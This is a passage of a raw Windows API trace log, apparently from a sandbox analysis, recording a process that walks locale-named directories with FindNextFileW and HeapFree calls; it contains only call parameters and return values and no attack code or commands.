ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1046", cAlternateFileName="")) returned 1 [0299.583] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.583] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a8a2df, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a8a2df, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a8a2df, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1048", cAlternateFileName="")) returned 1 [0299.585] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.585] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b87f8e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6b87f8e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b87f8e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1049", cAlternateFileName="")) returned 1 [0299.586] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.586] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcc62b13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcc62b13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcc62b13, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1050", cAlternateFileName="")) returned 1 [0299.587] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.587] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x303975a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x303975a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1051", cAlternateFileName="")) returned 1 [0299.588] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.588] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bd3439, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bd3439, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bd3439, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1053", cAlternateFileName="")) returned 1 [0299.589] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.589] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf443017d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1054", cAlternateFileName="")) returned 1 [0299.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.593] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0089415, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0089415, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1055", cAlternateFileName="")) returned 1 [0299.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.593] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa8eba59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1057", cAlternateFileName="")) returned 1 [0299.595] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.595] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a046b0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1a046b0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1a046b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1058", cAlternateFileName="")) returned 1 [0299.596] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.596] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99b89f6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99b89f6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1060", cAlternateFileName="")) returned 1 [0299.598] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.598] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2d943c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1061", cAlternateFileName="")) returned 1 [0299.599] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.599] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1992fb3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992fb3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992fb3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1062", cAlternateFileName="")) returned 1 [0299.853] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0299.853] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1063", cAlternateFileName="")) returned 1 [0301.108] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.108] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1066", cAlternateFileName="")) returned 1 [0301.113] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.113] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1069", cAlternateFileName="")) returned 1 [0301.115] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.115] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5afc9d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1081", cAlternateFileName="")) returned 1 [0301.117] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.117] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7a2268a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7abb0bc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7abb0bc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1086", cAlternateFileName="")) returned 1 [0301.119] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.119] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1087", cAlternateFileName="")) returned 1 [0301.120] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.120] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf61fd8b4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61fd8b4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61fd8b4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1110", cAlternateFileName="")) returned 1 [0301.121] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.121] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc47ce76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc47ce76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc47ce76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2052", cAlternateFileName="")) returned 1 [0301.123] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.123] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c40a24, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c40a24, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2070", cAlternateFileName="")) returned 1 [0301.124] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.124] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf17ee5c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2074", cAlternateFileName="")) returned 1 [0301.124] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.124] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0301.126] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.126] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9242", cAlternateFileName="")) returned 1 [0301.127] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x414ab00 | out: hHeap=0x470000) returned 1 [0301.127] FindNextFileW (in: hFindFile=0x39485e8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9242", cAlternateFileName="")) returned 0 [0301.127] FindClose (in: hFindFile=0x39485e8 | out: hFindFile=0x39485e8) returned 1 [0301.128] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0301.128] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0301.133] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0301.133] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0301.139] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0301.139] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0301.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0301.624] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe99511, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0301.626] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0301.626] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5612cee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5612cee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5612cee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ae38, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0301.629] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0301.629] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0301.631] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0301.631] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0301.634] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0301.634] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02eb98a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0303.844] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0303.844] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefebf763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0303.883] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0303.883] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16867e02, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16867e02, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0303.955] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0303.955] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16841bb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f913, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracedefinition110.xml", cAlternateFileName="TRACED~1.XML")) returned 1 [0304.285] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0304.285] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf164abda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0304.546] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0304.550] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefebf763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0304.877] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0304.877] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0305.138] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 